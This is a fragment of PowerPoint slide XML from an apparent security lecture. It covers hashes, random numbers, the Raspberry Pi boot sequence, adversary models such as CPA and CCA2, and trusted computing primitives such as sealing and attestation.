            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Private Key (p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9112250" y="1778556"/>
            <a:ext cx="1524000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Plaintext (P)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="1621330"/>
            <a:ext cx="10350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Decrypt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(P)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8458200" y="2007155"/>
            <a:ext cx="6096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3" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="2007155"/>
            <a:ext cx="2286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4" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4419600" y="2330280"/>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
        <p:nvSpPr>
          <p:cNvPr id="35" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7848600" y="2341855"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26440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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185195" y="208174"/>
            <a:ext cx="11730681" cy="1110050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cryptographic hashes, random numbers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22533" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="1794386"/>
            <a:ext cx="11458675" cy="4744526"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Cryptographic hashes (h:{0,1}*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>{0,1}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="30000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>). </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Examples: SHA-256, SHA-512, Keccack </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bs is the output block size in bits--- 160, 256, 512 are common)</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One way: Given b=h(a), it is hard (infeasible) to find a.</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Collision Resistant: Given b=h(a), it is hard to find a’ such that h(a’)= b.</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Cryptographic random numbers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Not predictable even with knowledge of source design</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Passing standard statistical tests is a necessary but not sufficient condition for cryptographic randomness.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Require “high-entropy” source.</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Huge weakness in real cryptosystems.</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Pseudorandom number generators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Stretch random strings into longer strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120991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19" y="113983"/>
            <a:ext cx="11401063" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Raspberry Pi detailed boot: hardware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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{844A2C2D-B492-5D44-BC9C-8C0F743F27E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="364381" y="1689356"/>
            <a:ext cx="11112137" cy="39414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buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ARM cores reset, SDRAM disabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>GPU executes bootloader from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>RoM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> on Soc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Loads second stage bootloader (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>bincode.bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Enables SDRAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Passes control to GPU FW (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>start.elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Initializes DMA and mailboxes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Sets up bus MMU to allow ARM cores to access memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Boots ARM cores in EL2 mode [All core but boot core placed in wait loop]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Loads kernel (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>kernel.img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Kernel.img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> (which may be final stage bootloader like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>uBoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>) proceeds with core initialization etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D93A69B-0C5F-FA45-8AA8-8BCA31344D33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="845127" y="6151418"/>
            <a:ext cx="6572633" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From “Have your Pi and eat it too, Vasudevan and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Chaki</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19725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B39C6C8-4A62-4243-B321-4EDA814F7980}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26628" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234778" y="258096"/>
            <a:ext cx="11528854" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Computational strength of adversary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26629" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580768" y="2057400"/>
            <a:ext cx="10873946" cy="3505200"/>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Infinite - Perfect Security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Information Theoretic.</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Doesn’t depend on computing resources or time available.</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Polynomial</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Asymptotic measure of computing power.</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Indicative but not dispositive.</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Realistic</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actual computing resources under known or suspected attacks.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This is us, low brow.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16970163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EC9DCE-7AFA-4623-85D8-E2538F43A6EA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="224672" y="304800"/>
            <a:ext cx="11331146" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="sv-SE" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>strength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE"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of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>adversary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36869" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383059" y="1800398"/>
            <a:ext cx="11532817" cy="4368114"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="9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ciphertext only (Yikes!)</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Rare these days</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corresponding plaintext/ciphertext attack</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chosen plaintext and corresponding ciphertext (CPA, offline attack)</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adversary can only encrypt messages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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chosen, non-adaptive chosen ciphertext attack and plaintext (CCA1)</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adversary has access to a decryption oracle until, but not after, it is given the target ciphertext</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="9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Adaptive chosen ciphertext attack (CCA2)</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adversary has unlimited access to a decryption oracle, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>except that the oracle rejects the target ciphertext</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CCA2 model is very general – in practice, adversaries are much weaker than a full-strength CCA2 adversary</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Yet, many adversaries are too strong to fit into CCA1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC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43943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EC9DCE-7AFA-4623-85D8-E2538F43A6EA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="224672" y="304800"/>
            <a:ext cx="11331146" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Trusted computing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36869" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584731" y="1899252"/>
            <a:ext cx="11331145" cy="4368114"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Software as a security principal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Cryptography  as a framework for isolation, confidentiality, integrity, authentication and authorization</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Measurement</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Isolation</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Seal and unseal</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Attest</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Randomness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402251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753762" y="144384"/>
            <a:ext cx="10873946" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" i="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Building</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> a secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>distributed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
